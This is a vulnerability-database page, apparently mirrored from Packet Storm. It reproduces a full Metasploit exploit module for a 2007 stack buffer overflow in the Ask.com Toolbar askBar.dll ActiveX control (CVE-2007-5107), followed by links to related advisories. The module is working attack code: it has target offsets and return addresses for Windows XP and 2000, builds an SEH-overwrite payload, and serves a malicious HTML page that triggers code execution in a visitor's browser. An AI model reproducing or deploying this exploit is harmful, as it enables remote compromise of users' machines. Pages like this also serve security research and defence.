Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83215
HistoryNov 26, 2009 - 12:00 a.m.

Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
17

0.923 High

EPSS

Percentile

99.0%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in Ask.com Toolbar 4.0.2.53.  
An attacker may be able to excute arbitrary code by sending an overly  
long string to the "ShortFormat()" method in askbar.dll.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'MC' ],   
'Version' => '$Revision$',  
'References' =>   
[  
[ 'CVE', '2007-5107' ],  
[ 'OSVDB', '37735' ],  
[ 'URL', 'http://wslabi.com/wabisabilabi/showBidInfo.do?code=ZD-00000148' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 800,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP SP0/SP1 Pro English', { 'Offset' => 2876, 'Ret' => 0x71aa32ad } ],  
[ 'Windows 2000 Pro English ALL', { 'Offset' => 1716, 'Ret' => 0x75022ac4 } ],  
],  
'DisclosureDate' => 'Sep 24 2007',  
'DefaultTarget' => 0))  
end  
  
def autofilter  
false  
end  
  
def check_dependencies  
use_zlib  
end  
  
def on_request_uri(cli, request)  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Randomize some things  
vname = rand_text_alpha(rand(100) + 1)  
strname = rand_text_alpha(rand(100) + 1)  
  
# Set the exploit buffer   
filler = rand_text_alpha(target['Offset'])  
seh = generate_seh_payload(target.ret)  
sploit = filler + seh + rand_text_alpha(payload.encoded.length)   
  
# Build out the message  
content = %Q|  
<html>  
<object classid='clsid:5A074B2B-F830-49DE-A31B-5BB9D7F6B407' id='#{vname}'></object>  
<script language='javascript'>  
#{strname} = new String('#{sploit}');  
#{vname}.ShortFormat = #{strname}  
</script>  
</html>  
|  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
`

Related

nessus 1
checkpoint_advisories 1
cve 2
prion 2
cvelist 2
nvd 2
nessus
nessus
Ask.com Toolbar AskJeevesToolBar.SettingsPlugin.1 ActiveX (askBar.dll) ShortFormat Property Arbitrary Code Execution
2008-02-13 00:00:00
checkpoint_advisories
checkpoint_advisories
Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow (CVE-2007-5107)
2011-12-27 00:00:00
cve
cve
CVE-2007-5108
2007-09-26 23:17:00
CVE-2007-5107
2007-09-26 23:17:00
prion
prion
Information disclosure
2007-09-26 23:17:00
Stack overflow
2007-09-26 23:17:00
cvelist
cvelist
CVE-2007-5108
2007-09-26 23:00:00
CVE-2007-5107
2007-09-26 23:00:00
nvd
nvd
CVE-2007-5107
2007-09-26 23:17:00
CVE-2007-5108
2007-09-26 23:17:00

0.923 High

EPSS

Percentile

99.0%

JSON
Related for PACKETSTORM:83215
nessus1checkpoint_advisories1cve2prion2cvelist2nvd2